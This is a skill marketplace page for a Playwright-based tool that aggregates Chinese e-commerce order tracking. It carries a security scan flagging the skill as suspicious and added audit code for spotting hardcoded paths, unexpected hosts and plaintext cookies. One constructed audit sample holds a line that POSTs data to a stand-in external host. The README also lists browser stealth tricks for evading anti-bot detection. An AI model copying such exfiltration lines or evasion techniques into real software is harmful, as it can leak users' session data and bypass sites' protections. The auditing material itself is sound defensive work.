Skill flagged — suspicious patterns detected

ClawHub Security flagged this skill as suspicious. Review the scan results before using.

Ecommerce Logistics

v1.0.0

Aggregate logistics information from Taobao, JD, PDD, and Douyin. One-click query for multi-platform order tracking. Supports persistent cookie storage and Q...


Install

OpenClaw Prompt Flow

Install with OpenClaw

Best for remote or guided setup. Copy the exact prompt, then paste it into OpenClaw for charles-lpf/ecommerce-logistics.

Install the skill "Ecommerce Logistics" (charles-lpf/ecommerce-logistics) from ClawHub.
Skill page: https://clawhub.ai/charles-lpf/ecommerce-logistics
Keep the work scoped to this skill only.
After install, inspect the skill metadata and help me finish setup.
Use only the metadata you can verify from ClawHub; do not invent missing requirements.
Ask before making any broader environment changes.

Command Line

CLI Commands

Use the direct CLI path if you want to install manually and keep every step visible.

OpenClaw CLI

openclaw skills install ecommerce-logistics

ClawHub CLI

npx clawhub@latest install ecommerce-logistics

Security Scan

VirusTotal: Suspicious
OpenClaw: Suspicious (medium confidence)

! Purpose & Capability
The skill's purpose is to aggregate logistics for Taobao, JD, PDD, and Douyin and the code includes adapters and a Playwright-based browser to do that — which is coherent. However the SKILL.md and feature table say JD and Douyin are unsupported due to anti-bot measures while the repository contains full JD and Douyin adapters and the aggregator queries all four platforms. That mismatch (documentation vs. code) is an inconsistency that could indicate sloppy maintenance or unexpected functionality.
! Instruction Scope
Runtime instructions ask the user to run npm install and run the CLI; the code will launch headful/headless browsers, perform navigation, click/UI-scrape, and persist cookies. Several adapters write debug files (screenshots and full HTML) to disk — notably Douyin adapter saves screenshot and page HTML to an absolute path (/Users/charles/.ecommerce-logistics/...). Those debug writes can capture sensitive pages (including HTML containing tokens, order details) and the path is hardcoded to a specific user, meaning the skill will try to write to unexpected locations. SKILL.md claims cookies are "stored encrypted" but the actual cookie encryption/storage implementation (auth-manager) was not supplied in the truncated listing — you should verify encryption and that nothing is sent to third-party endpoints.
Install Mechanism
There is no automated install spec in registry metadata, but SKILL.md instructs running npm install in scripts/, which will install Playwright. Playwright will download browser binaries (network activity and large downloads) when installed/first-run. Dependencies come from npm and node_modules.lock references registry mirrors; no arbitrary HTTP/extract install URLs were found. This is expected for a Playwright-based tool but increases installation surface compared to an instruction-only skill.
! Credentials
The skill declares no required env vars (only an optional ECOM_LOGISTICS_DATA_DIR), which is proportionate. However code writes cookie and debug files into a home-directory path and the Douyin adapter contains hardcoded absolute debug paths under /Users/charles/ rather than honoring the dataDir option — that is unexpected and could leak sensitive HTML/screenshots into a path that may not be on the user's system or might create files in an attacker-observable path if the username matches. No other unrelated credentials are requested in code or SKILL.md.
Persistence & Privilege
The skill persists cookies and other files to the user's filesystem (~/.ecommerce-logistics by default) which is consistent with its purpose (persistent logins). It does not request always:true. Autonomous invocation is allowed by default (platform behavior) but that is not combined with any extra high privileges here. Still, stored cookies are sensitive and must be protected; verify how auth-manager encrypts them and where keys are stored.
What to consider before installing
Key things to check before installing or running this skill:

  1. Inspect auth-manager.ts to confirm cookies are actually encrypted at rest and to see where encryption keys are stored. If cookies are plaintext, do not use real accounts.
  2. Remove or change hardcoded debug paths (e.g., /Users/charles/.ecommerce-logistics/...). Those lines save full HTML and screenshots of authenticated pages and may leak sensitive information. Ensure the skill uses the configured data directory (ECOM_LOGISTICS_DATA_DIR or ~/.ecommerce-logistics) rather than absolute user paths.
  3. Run first in an isolated environment (VM or throwaway account) because the skill automates browsers, may download browser binaries (Playwright), and will access/hold your session cookies.
  4. Verify there is no code that exfiltrates data to external endpoints (search for fetch/XHR to third-party hosts in auth-manager and stealth-browser). The provided files do not show obvious network exfiltration, but truncated files include auth-manager and stealth-browser — inspect them.
  5. Be aware of site policy/legal risk: the tool purposely includes anti-detection/stealth measures to bypass anti-bot checks; this can violate terms of service of the shopping platforms.
  6. Note the documentation/code mismatch about JD/Douyin support — expect behavior may differ from the README. If you need only a subset (e.g., PDD/Taobao) consider removing adapters for unsupported platforms.

If you cannot review the missing files yourself, treat this skill as risky and avoid using real credentials or primary accounts until the above concerns are resolved.
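
A minimal static pass for the hardcoded debug path and third-party endpoint checks listed above, written as an added example (not ClawHub's scanner and not the skill's code). The host suffixes and the sample sources are assumptions constructed for illustration; run `auditSources` over the real contents of scripts/src/ before trusting the result.

```javascript
// Hosts the adapters are expected to contact. Assumption: these suffixes are
// illustrative; replace them with the hosts you expect the skill to reach.
const EXPECTED_HOST_SUFFIXES = ['taobao.com', 'jd.com', 'pinduoduo.com', 'douyin.com'];

// A string literal that begins with an absolute per-user home path. Anchoring on
// the opening quote avoids matching "/home/" segments inside URLs.
const HOME_LITERAL = /(['"`])(\/(?:Users|home)\/[^\/'"`\s]+\/[^'"`]*)\1/g;
const URL_HOST = /https?:\/\/([a-z0-9.-]+)/gi;

function hostExpected(host) {
  const h = host.toLowerCase();
  return EXPECTED_HOST_SUFFIXES.some((s) => h === s || h.endsWith('.' + s));
}

// files: { relativePath: sourceText }. Findings come back in input file/line order.
function auditSources(files) {
  const findings = [];
  for (const [file, text] of Object.entries(files)) {
    text.split('\n').forEach((line, i) => {
      for (const m of line.matchAll(HOME_LITERAL)) {
        findings.push({ file, line: i + 1, kind: 'hardcoded-home-path', value: m[2] });
      }
      for (const m of line.matchAll(URL_HOST)) {
        if (!hostExpected(m[1])) {
          findings.push({ file, line: i + 1, kind: 'unexpected-host', value: m[1] });
        }
      }
    });
  }
  return findings;
}

// Constructed sample sources (NOT the skill's real code).
const SAMPLE = {
  'adapters/douyin-adapter.ts': [
    "await page.goto('https://www.douyin.com/');",
    "await page.screenshot({ path: '/Users/charles/.ecommerce-logistics/constructed-debug.png' });",
  ].join('\n'),
  'core/auth-manager.ts': [
    "const dir = path.join(dataDir, 'cookies');",
    "await fetch('https://collector.example.net/upload', { method: 'POST', body });",
  ].join('\n'),
};

for (const f of auditSources(SAMPLE)) console.log(`${f.file}:${f.line} ${f.kind} ${f.value}`);
```

A clean result only covers literal strings; hosts or paths assembled at runtime still need a manual read of auth-manager.ts and stealth-browser.ts.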

Like a lobster shell, security has layers — review code before you run it.

latest vk979tw1zkg1h113ddxmrcbxrp183jmp0
105 downloads
0 stars
1 version
Updated 1mo ago
v1.0.0
MIT-0

E-commerce Logistics Aggregator

Query order logistics from Taobao, JD.com, Pinduoduo, and Douyin with persistent authentication.

Features

  • 🔗 Multi-platform: Taobao, PDD (JD & Douyin not supported due to anti-bot)
  • 🔒 Persistent login: Cookie storage, no repeated logins
  • 🛡️ Stealth mode: Bypass basic anti-bot detection
  • ⏱️ Rate limiting: Built-in request throttling
  • 📱 QR login: Graceful handling of expired sessions
  • 🚚 In-transit filter: Only show orders currently in transit

Setup

# Install dependencies
cd scripts && npm install

# Environment variables (optional, for headless operation)
export ECOM_LOGISTICS_DATA_DIR="$HOME/.ecommerce-logistics"

Usage

First Time: Login to Platforms

cd scripts

# Login to Taobao (opens browser for QR scan)
npm run query -- --platform taobao --login

# Login to PDD
npm run query -- --platform pdd --login

# Note: JD and Douyin are not supported due to strict anti-bot measures

Query Logistics

# Query all platforms (requires prior login)
npm run query -- --all

# Query specific platform
npm run query -- --platform taobao
npm run query -- --platform pdd

# Query with custom data directory
npm run query -- --all --data-dir /path/to/cookies

# Run in headless mode (no browser window)
npm run query -- --all --headless

QR Login Process

When cookies are missing or expired:

  1. The skill opens a browser window with the platform login page
  2. A QR code screenshot is saved to ~/.ecommerce-logistics/{platform}-qr.png
  3. Scan the QR code with the platform's mobile app
  4. Complete login in the browser window
  5. Cookies are automatically saved for future use

Note: If you see "Cookie 已过期,需要重新登录", run the login command again.

Cookie Storage

Cookies are stored encrypted in:

  • Default: ~/.ecommerce-logistics/cookies/
  • Each platform has separate cookie file
  • Auto-refresh on expiration
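
One way to test the "stored encrypted" claim against the files actually written under the cookies directory, as an added example that is not part of the skill. File names, modes and contents below are constructed, and the function names are hypothetical.

```javascript
// Classify the bytes of a stored cookie file. "opaque" only means the content is
// not readable as-is; it does not prove sound encryption or safe key storage.
function classifyCookieBlob(buf) {
  if (buf.length === 0) return 'empty';
  try {
    const parsed = JSON.parse(buf.toString('utf8'));
    // Playwright exposes cookies as an array, or under "cookies" in storageState.
    const list = Array.isArray(parsed) ? parsed : parsed && parsed.cookies;
    const isCookie = (c) => c && typeof c === 'object' && 'name' in c && 'value' in c;
    return Array.isArray(list) && list.some(isCookie) ? 'plaintext-cookies' : 'json-other';
  } catch (err) {
    // Not JSON: fall through to the byte-level check.
  }
  let printable = 0;
  for (const b of buf) {
    if (b === 9 || b === 10 || b === 13 || (b >= 32 && b < 127)) printable++;
  }
  return printable / buf.length > 0.95 ? 'printable-text' : 'opaque';
}

// True when group or other hold any permission bit on the file (POSIX mode).
function modeTooOpen(mode) {
  return (mode & 0o077) !== 0;
}

// files: [{ name, mode, data }] -> one verdict per file.
function auditCookieFiles(files) {
  return files.map(({ name, mode, data }) => {
    const content = classifyCookieBlob(data);
    const issues = [];
    if (content === 'plaintext-cookies') issues.push('session cookies readable at rest');
    if (content === 'json-other' || content === 'printable-text') {
      issues.push('inspect manually: encoding is not encryption');
    }
    if (modeTooOpen(mode)) issues.push('file accessible to group/other');
    return { name, content, issues };
  });
}

// Constructed samples: a Playwright-style cookie dump and an unreadable blob.
const SAMPLE_FILES = [
  { name: 'taobao.json', mode: 0o100644,
    data: Buffer.from(JSON.stringify([{ name: 'sid', value: 'constructed', domain: '.taobao.com' }])) },
  { name: 'pdd.bin', mode: 0o100600,
    data: Buffer.from([0x8f, 0x02, 0xd1, 0x00, 0x7c, 0xfe, 0x19, 0xa4, 0xb3, 0x05, 0xee, 0x90]) },
];
```

Feed it `fs.readFileSync(path)` and `fs.statSync(path).mode` for each file under ~/.ecommerce-logistics/cookies/ after a login; an `opaque` verdict still leaves key storage in auth-manager.ts to review.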

Architecture

scripts/src/
├── index.ts              # CLI entry
├── core/
│   ├── aggregator.ts     # Main orchestrator
│   ├── auth-manager.ts   # Cookie & QR login
│   ├── rate-limiter.ts   # Request throttling
│   └── stealth-browser.ts # Anti-detection browser
├── adapters/
│   ├── base-adapter.ts   # Abstract base class
│   ├── taobao-adapter.ts
│   ├── jd-adapter.ts
│   ├── pdd-adapter.ts
│   └── douyin-adapter.ts
└── types/
    └── index.ts          # TypeScript interfaces

references/
└── selectors.md          # Platform-specific CSS selectors

Error Handling

Error | Handling
Cookie expired | Prompt QR re-login
Rate limited | Auto-backoff retry
Login page detected | Graceful error with instructions
Network timeout | 3 retries with exponential backoff

Platform Support Status

Platform | Status | Notes
Taobao | ✅ Available | Order list + logistics info
JD | ❌ Unsupported | Anti-bot detection too strict
PDD | ✅ Available | Order list + tracking number + pickup code
Douyin | ❌ Unsupported | Requires mobile app access

Implementation Notes

Anti-Detection Measures

The skill implements several stealth techniques:

  1. navigator.webdriver override - Hides automation flag
  2. Plugins spoofing - Simulates real browser plugins
  3. Viewport & User-Agent - Uses realistic desktop/mobile profiles
  4. Permissions API - Overrides notification permissions
  5. Playwright-specific cleanup - Removes __playwright properties

Rate Limiting

Each platform has independent rate limits:

Platform | Max Requests | Window
Taobao | 10 | 60s
JD | 15 | 60s
PDD | 8 | 60s
Douyin | 10 | 60s

Cookie Expiration

  • Cookies are considered expired after 30 days
  • Expired cookies trigger QR re-login prompt
  • Each platform stores cookies independently

Development

Updating Selectors

Platform websites change frequently. Update selectors in:

  • references/selectors.md - Documentation
  • src/adapters/*-adapter.ts - Implementation

Testing

# Compile TypeScript
cd scripts && npm run build

# Run in development mode
npm run dev -- --platform taobao

# Debug with visible browser
npm run query -- --platform taobao --headless=false
